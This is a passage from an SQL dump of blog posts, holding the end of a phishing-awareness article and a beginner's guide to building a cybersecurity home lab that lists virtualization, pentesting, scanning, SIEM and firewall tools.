class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Be Cautious with Attachments</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails may include malware-laden attachments disguised as invoices, reports, or other documents. Opening these files can compromise your device and lead to data theft.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Safe Practices</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Avoid downloading or opening attachments from unknown or unverified senders.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Tools for Attachment Safety</strong></b>:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Platforms like <b><strong class=\"font-bold\">VirusTotal</strong></b> or <b><strong class=\"font-bold\">Hybrid Analysis</strong></b> can scan attachments to detect potential threats.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips to Avoid Falling for Phishing Emails</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always verify the authenticity of suspicious emails by directly contacting the sender through a verified communication method (like their official website or phone number).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Keep your email security settings at the highest protection levels.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Regularly update your operating system and antivirus software to add an extra layer of malware protection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Use Two-Factor Authentication (2FA) for your online accounts for additional security.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools to Enhance Detection of Phishing Emails</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider these tools to help fortify your defenses against phishing attempts:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hunter.io</strong></b> or <b><strong class=\"font-bold\">Maltego</strong></b> for investigating email senders.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">VirusTotal</strong></b> and <b><strong class=\"font-bold\">URLScan</strong></b> for checking suspicious links or attachments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Have I Been Pwned</strong></b> for monitoring email breaches.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Bottom Line</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails are one of the most common cyber threats, but knowledge and vigilance are your best defense. By staying informed and following the tips mentioned above, you can significantly reduce your chances of falling victim to phishing scams.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When in doubt, avoid interacting with suspicious emails altogether and reach out to the organization directly through a verified contact method.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Have you encountered a phishing attempt recently? Share your experiences in the comments below to help others stay protected.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:32:12', '2026-01-12 21:41:44', 'Phishing', 'How to Recognize and Avoid Phishing Emails to Stay Secure', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(133, 'Building a Home Lab for Cybersecurity Beginners', 'building-a-home-lab-for-cybersecurity-beginners', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you interested in a career in cybersecurity or simply passionate about exploring the field? A home lab is one of the best ways to develop hands-on skills and deepen your knowledge in a controlled and safe environment. Designed to simulate real-world scenarios, a home lab helps you practice both attacking and defending systems, preparing you for the challenges you\'ll encounter in the cybersecurity landscape.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will provide an in-depth look at the essential components you\'ll need to build a home lab for cybersecurity, along with tips for setting it up successfully. Buckle up—your cybersecurity adventure starts here.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Home Lab and Why Is It Important?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A home lab serves as a sandbox environment where aspiring cybersecurity professionals or enthusiasts can safely experiment, learn, and practice. It removes the risk of testing on live systems while giving you the flexibility to replicate various network setups and scenarios. Whether you\'re interested in penetration testing, ethical hacking, or network defense, a home lab is your training ground to gain practical experience.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But before you get started, you\'ll need specific tools, software, and equipment to set up your lab. Let\'s break them down step by step.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Virtualization Software: The Backbone of Your Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtualization software is the foundation of any home lab. It lets you run multiple virtual machines (VMs) on a single physical computer, essentially allowing one computer to act like many. This flexibility is crucial for simulating networks and testing different configurations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Virtualization Tools</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">VirtualBox</strong></b> (Free and open-source)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">VMware Workstation Player</strong></b> (Free for personal use; Pro version available with more features)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Hyper-V</strong></b> (Built into Windows 10 Pro and Enterprise editions)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With virtualization software, you can install various operating systems and applications on your virtual machines, creating isolated environments for hands-on learning.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Operating Systems to Include in Your Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize your learning, install a mix of operating systems to simulate diverse scenarios and vulnerabilities. Different platforms have unique security challenges, and understanding how they work is crucial in your cybersecurity training.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Must-Have Operating Systems</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Windows</strong></b> (e.g., Windows 10/11): Widely used in businesses, making it essential for practicing defending workstations and servers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Linux Distributions</strong></b>: Popular options include Ubuntu, Kali Linux (for penetration testing), and Fedora. Kali Linux, in particular, is a staple for those interested in ethical hacking.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">macOS</strong></b> (if available): Though less commonly targeted, it\'s valuable for testing compatibility and gaining insights into its security ecosystem.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Having this variety of operating systems ensures you\'re well-versed in handling threats across multiple platforms.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Essential Tools and Software for Cybersecurity Practice</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The tools you use in your home lab will play a significant role in developing your skills. Here’s a breakdown of some key categories and recommended software/tools for each.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Penetration Testing Tools</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Practicing penetration testing helps sharpen your ability to identify and exploit vulnerabilities—skills highly sought after in the industry.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Metasploit Framework</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Nmap</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Aircrack-ng</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">John the Ripper</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerability Scanners</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Vulnerability scanners locate and assess weaknesses within a system or network.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Nessus</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">OpenVAS</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">QualysGuard</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Security Information and Event Management (SIEM) Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SIEM tools monitor, analyze, and log security events, making them invaluable for learning network defense strategies.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Splunk</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Elastic Stack (formerly ELK Stack)</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Graylog</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Firewalls</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Firewalls form the basis of network security. Explore configuring and managing these in your lab.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">pfSense</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Untangle</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Sophos UTM</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A combination of these tools will give you the breadth and depth of skills you need.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Networking Equipment for Real-World Simulations</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To create a realistic network environment, you\'ll need the right networking equipment. While virtualization can simulate many networking features, physical equipment offers additional learning opportunities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Recommended Networking Hardware</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Routers</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Switches</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Network Adapters</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Firewalls</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This equipment allows you to practice configuring complex network setups, monitoring traffic, and testing attack scenarios in a simulated environment.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Importance of Sufficient Storage Space</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Working with virtualization and large data sets often requires significant storage space. A fast and reliable <b><strong class=\"font-bold\">solid-state drive (SSD)</strong></b> is recommended to store your virtual machines and operating systems, ensuring quick performance and minimal downtime.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider an SSD with at least <b><strong class=\"font-bold\">500GB or more</strong></b> to accommodate your growing lab. Additionally, external drives can help expand your storage capacity when needed.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Build and Maximize Your Home Lab</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Now that you know what you need, here’s how to put it all together:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Plan Your Setup</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Decide what tools, operating systems, and equipment fit your goals.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Install Virtualization Software</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Set up and configure your virtualization tool of choice.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Create Virtual Machines</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Install multiple operating systems, ensuring to allocate sufficient resources (CPU, RAM, storage) to each.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Install Cybersecurity Tools</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Download and configure open-source and commercial tools for practice.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Simulate a Network Environment</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use your networking equipment or virtualized networks to replicate a real-world setup.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"6\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Experiment Safely</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Practice penetration testing, vulnerability scanning, and network defense—all within your controlled environment.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Building a Home Lab for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating a home lab offers countless benefits:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hands-On Training</strong></b>: Theory only gets you so far; a home lab provides the hands-on experience employers value most.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Skill Development</strong></b>: Practice key skills like ethical hacking, network defense, and incident response.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Safe Learning Environment</strong></b>: Experimentation in your lab carries no real-world risks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Flexible Learning</strong></b>: Tinker and learn at your own pace, tailoring the experience to your interests and career goals.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re passionate about cybersecurity, a home lab is an invaluable investment in your future. Whether you\'re just getting started or looking to advance your skills, having the right tools and resources at your fingertips will help you excel in this dynamic field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Take the first step today—start setting up your cybersecurity home lab, and get ready to unlock your full potential. Happy learning!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:28:56', '2026-01-12 21:41:44', 'Information Security', 'Building a Home Lab for Cybersecurity Beginners', '', NULL),
